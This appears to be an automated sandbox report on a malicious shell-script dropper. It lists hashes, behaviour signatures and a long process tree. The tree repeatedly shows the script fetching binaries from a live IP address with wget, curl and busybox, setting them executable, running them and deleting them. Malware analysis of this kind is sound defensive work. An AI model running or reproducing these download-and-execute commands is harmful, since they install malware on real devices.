Analysis
-
max time kernel
109s -
max time network
111s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/11/2024, 02:06
Static task
static1
Behavioral task
behavioral1
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh
-
Size
10KB
-
MD5
f9ec55ea475d5bf2658f26f7f7280c34
-
SHA1
223f1daef72dbab6429966084f88ef60a26414c0
-
SHA256
294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d
-
SHA512
1eed0d4a83f257ce571b39a36402dcb8f57e8472144723dddd8f818dcdc12822d4fa9b2db7082665fd82ad30ab790dd8bafa0c7932ba13c04651e782f53953aa
-
SSDEEP
192:EJ/5zEEuzm7PVm+Dgxbw4STnf777PVm+/EEuzufw4STnKjo:y/5v7PVm+DgxMv7PVm+Bo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 854 chmod 860 chmod 896 chmod 968 chmod 740 chmod 962 chmod 752 chmod 797 chmod 884 chmod 914 chmod 920 chmod 805 chmod 950 chmod 956 chmod 974 chmod 878 chmod 890 chmod 902 chmod 908 chmod 734 chmod 833 chmod 848 chmod 926 chmod 944 chmod 866 chmod 872 chmod 932 chmod 938 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ 735 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT 741 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s 754 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 798 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk 806 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m 835 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q 849 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM 855 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 861 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv 867 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj 873 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI 879 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh 885 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy 891 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 897 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk 903 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m 909 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q 915 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM 921 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv 927 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy 933 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj 939 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI 945 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh 951 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 957 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ 963 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT 969 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s 975 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj curl File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh curl File opened for modification /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT curl File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk curl File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q curl File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM curl File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m curl File opened for modification /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 curl File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy curl File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI curl File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv curl File opened for modification /tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj curl File opened for modification /tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy curl File opened for modification /tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q curl File opened for modification /tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk curl File opened for modification /tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv curl File opened for modification /tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI curl File opened for modification /tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM curl File opened for modification /tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4 curl File opened for modification /tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT curl File opened for modification /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s curl File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 curl File opened for modification /tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh curl File opened for modification /tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5 curl File opened for modification /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ curl File opened for modification /tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s curl File opened for modification /tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ curl File opened for modification /tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m curl
Processes
-
/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh/tmp/294d4b067b8e3fcdf52ba7fb6f9bb1f7c66a53ffb00dba6d931ff2351c33c40d.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:712
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:732
-
-
/bin/chmodchmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:736
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:737
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:739
-
-
/bin/chmodchmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:742
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:743
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:747
-
-
/bin/chmodchmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:756
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:758
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:796
-
-
/bin/chmodchmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:799
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:800
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:802
-
-
/bin/chmodchmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:809
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:810
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:827
-
-
/bin/chmodchmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:838
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:839
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:847
-
-
/bin/chmodchmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Executes dropped EXE
PID:849
-
-
/bin/rmrm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:850
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:851
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:852
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:853
-
-
/bin/chmodchmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:856
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:857
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:859
-
-
/bin/chmodchmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:862
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:863
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:865
-
-
/bin/chmodchmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:868
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:869
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:871
-
-
/bin/chmodchmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:874
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:875
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:877
-
-
/bin/chmodchmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:880
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:881
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:883
-
-
/bin/chmodchmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:886
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:887
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:889
-
-
/bin/chmodchmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:892
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:893
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:895
-
-
/bin/chmodchmod 777 BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z5./BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm BpnxJkQZPfrLd9hCOcQ9Q4A7JjfebRe3Z52⤵PID:898
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:899
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:901
-
-
/bin/chmodchmod 777 DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk./DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm DWUI7RqVVm8mAK0caHpFzLiVzljQMTwXsk2⤵PID:904
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:905
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:907
-
-
/bin/chmodchmod 777 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m./8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm 8iiBSgWNuSm8TNyjitYKl1sRXOg9oOx06m2⤵PID:910
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:911
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:913
-
-
/bin/chmodchmod 777 LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q./LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm LpBCzYUMsNdSsGQb0lxnnBQkxTdZddB71q2⤵PID:916
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:917
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:919
-
-
/bin/chmodchmod 777 ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM./ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm ybAtLFXX6sYaOyM5l5MT515fLqZCesmVaM2⤵PID:922
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:923
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:925
-
-
/bin/chmodchmod 777 Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv./Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm Gy9IK4uA4wvcikSFdK0EMXpW4lPF4UjfXv2⤵PID:928
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:929
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:931
-
-
/bin/chmodchmod 777 RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- File and Directory Permissions Modification
PID:932
-
-
